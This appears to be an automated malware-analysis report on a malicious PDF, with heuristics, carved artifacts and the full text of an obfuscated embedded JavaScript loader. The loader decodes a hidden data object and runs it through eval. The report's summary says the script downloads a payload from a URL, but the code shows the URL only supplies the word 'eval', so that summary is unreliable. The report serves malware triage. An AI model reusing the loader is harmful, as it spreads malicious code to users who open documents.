MALICIOUS
76
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1566.001 Spearphishing Attachment
The PDF contains embedded JavaScript that attempts to reconstruct a URL and download a payload. The script concatenates 'http://e' and 'val/query?a=exemple&b=2' to form the full URL 'http://eval/query?a=exemple&b=2'. The ML classifier strongly indicates maliciousness, and the JavaScript action heuristic confirms the presence of executable code. The embedded file artifact suggests a dropped payload.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 5
-
Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTHA PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
embedded_file_obj0013.bin |
pdf-embedded-file | PDF EmbeddedFile object 13 at offset 0x425 | 108545 bytes |
SHA-256: 98720ebab90780a36ff548420b18401c3d1211d6f56084e8fd1583f496bf6f81 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
256 of 256 identifiers look randomly generated (e.g. 'yFz9INilwZ6VeyFS1yFz9INilwZ6VeyFS2yFz9IN') — consistent with name-mangling obfuscation. Carved artifact contains 97 long base64-like blob(s).
|
|||
javascript_obj0008_000.js |
pdf-javascript-stream | PDF /JS object 8 at offset 0x1ED | 230 bytes |
SHA-256: 30730f7211a4326508ddb42f6ade15490f8aedd18900cefc39ff128ab006862e |
|||
Preview scriptFirst 1,000 lines of the extracted script
zx1=this.getDataObjectContents("clown");zx2=util.stringFromStream(zx1, "utf-8");zx3="";for (i=0;i<zx2.length;i +=17){ zx3 +=zx2.charAt(i);}zx4="http://e"+"val/query?a=exemple&b=2";zx5=util.crackURL(zx4).cHost;this[zx5](zx3);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.